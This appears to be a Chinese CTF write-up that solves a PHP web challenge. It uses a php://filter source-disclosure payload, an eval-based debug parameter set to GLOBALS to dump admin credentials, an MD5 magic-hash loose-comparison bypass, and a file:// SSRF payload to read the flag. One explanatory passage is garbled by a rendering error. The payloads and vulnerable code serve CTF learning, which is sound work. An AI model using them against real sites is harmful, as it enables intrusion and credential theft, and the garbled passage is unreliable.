payload:action=php://filter/read=convert.base64-encode/resource=login.php
base64解码
<?php
include "config.php";
session_start();
//Only for debug
if (DEBUG_MODE){
if(isset($_GET['debug'])) {
$debug = $_GET['debug'];
if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
die("args error!");
}
eval("var_dump($$debug);");
}
}
if(isset($_SESSION['username'])) {
header("Location: admin.php");
exit();
}
else {
if (isset($_POST['username']) && isset($_POST['password'])) {
if ($admin_password == md5($_POST['password']) && $_POST['username'] === $admin_username){
$_SESSION['username'] = $_POST['username'];
header("Location: admin.php");
exit();
}
else {
echo "用户名或密码错误";
}
}
}
?>
从大意上我们能理解到作者把账号和密码放到了config.php文件下,所以我们只要找的文件就可以了
但是作者忘记一个重要的函数就是debug,,debug,这个变量会通过eval("var_dump(KaTeX parse error: Can't use function '$' in math mode at position 59: …局变量就可以拿到所有信息,引文$̲dug是一个变量,而两个是输出的意思,所以只需要给dubug一个变量就可以输出所有信息,因为是get方式,所以构造debug=GLOBALS。
array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "1hllumqt039vf9384rs80i5l8q" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { }
["GLOBALS"]=> array(9) { ["_GET"]=> array(1) { ["debug"]=> string(7) "GLOBALS" } ["_POST"]=> array(0) { } ["_COOKIE"]=> array(1) { ["PHPSESSID"]=> string(26) "1hllumqt039vf9384rs80i5l8q" } ["_FILES"]=> array(0) { } ["debug"]=> string(7) "GLOBALS" ["admin_password"]=> string(32) "0e114902927253523756713132279690" ["admin_username"]=> string(7) "Cosmos!" ["_SESSION"]=> &array(0) { } ["GLOBALS"]=> *RECURSION* } }
admin_username:Cosmos! admin_password:0e114902927253523756713132279690,因为题目说明密码的md5值相同,但是md5比较时用了"=="的弱类型比较,所有我们不必爆出密码的原来值
只需要找一个0e开头的皆可QNKCDZO ,
然后进入后台
<?php
include "config.php";
session_start();
if(!isset($_SESSION['username'])) {
header('Location: index.php');
exit();
}
function insert_img() {
if (isset($_POST['img_url'])) {
$img_url = @$_POST['img_url'];
$url_array = parse_url($img_url);
if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
return false;
}
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $img_url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($c);
curl_close($c);
$avatar = base64_encode($res);
if(filter_var($img_url, FILTER_VALIDATE_URL)) {
return $avatar;
}
}
else {
return base64_encode(file_get_contents("static/logo.png"));
}
}
?>
看别人的wp
payload:file://localhost/..//flag
了解到这是一个必须本地登陆的file协议
参考大佬的wp
https://blog.csdn.net/weixin_43900387/article/details/104105765